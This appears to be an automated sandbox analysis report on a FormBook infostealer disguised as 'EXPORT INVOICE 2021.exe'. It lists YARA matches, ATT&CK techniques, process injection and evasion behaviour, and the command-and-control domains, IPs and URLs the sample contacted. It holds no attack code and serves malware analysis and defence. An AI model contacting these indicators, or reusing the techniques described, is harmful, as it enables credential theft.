          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\EXPORT INVOICE 2021.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          (Digits after a technique name are the report's matched-signature count badges, kept as extracted. An empty cell means the report lists no technique for that tactic in that row.)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 121 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap |  | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 3 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 2 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

Behavior Graph

Behavior Graph ID: 502233, Sample: EXPORT INVOICE 2021.exe, Startdate: 13/10/2021, Architecture: WINDOWS, Score: 100

• Sample node: contacts www.zoipartner.com and www.sosibibyslot.space; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures
• EXPORT INVOICE 2021.exe started; dropped C:\Users\user\...XPORT INVOICE 2021.exe.log (ASCII); signature: Injects a PE file into a foreign processes
• EXPORT INVOICE 2021.exe (second instance) started by the first; signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
• explorer.exe injected by the second instance; contacts ratqueen.art (51.161.86.13, port 49778 to 80, OVHFR, Canada), www.piedmontpines.school (209.17.116.165, port 49780 to 80, DEFENSE-NETUS, United States) and 3 other IPs or domains; signature: System process connects to network (likely due to code injection or exploit)
• cmstp.exe started by explorer.exe; signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
• cmd.exe started by cmstp.exe
• conhost.exe started by cmd.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
EXPORT INVOICE 2021.exe | 33% | Virustotal |
EXPORT INVOICE 2021.exe | 17% | Metadefender |
EXPORT INVOICE 2021.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
2.2.EXPORT INVOICE 2021.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
www.vulcanopresale.icu/mqi9/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.ratqueen.art/mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa | 0% | Avira URL Cloud | safe
http://www.piedmontpines.school/mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ratqueen.art | 51.161.86.13 | true | true | | unknown
www.piedmontpines.school | 209.17.116.165 | true | true | | unknown
www.kalitelihavaperdesi.com | unknown | unknown | true | | unknown
www.sosibibyslot.space | unknown | unknown | true | | unknown
www.zoipartner.com | unknown | unknown | true | | unknown
www.ratqueen.art | unknown | unknown | true | | unknown
www.yuezhong66.com | unknown | unknown | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.vulcanopresale.icu/mqi9/ | true | Avira URL Cloud: safe | low
http://www.ratqueen.art/mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa | true | Avira URL Cloud: safe | unknown
http://www.piedmontpines.school/mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw | true | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.founder.com.cn/cn | EXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                        Contacted IPs


                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
51.161.86.13 | ratqueen.art | Canada | 16276 | OVHFR | true
209.17.116.165 | www.piedmontpines.school | United States | 55002 | DEFENSE-NETUS | true

                        General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502233
Start date: 13.10.2021
Start time: 18:20:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: EXPORT INVOICE 2021.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@10/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 26% (good quality ratio 22.8%)
• Quality average: 71.1%
• Quality standard deviation: 33.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.91.76.224, 131.253.33.200, 13.107.22.200, 20.82.209.183, 95.100.218.79, 93.184.221.240, 20.82.210.154, 2.20.178.33, 2.20.178.24
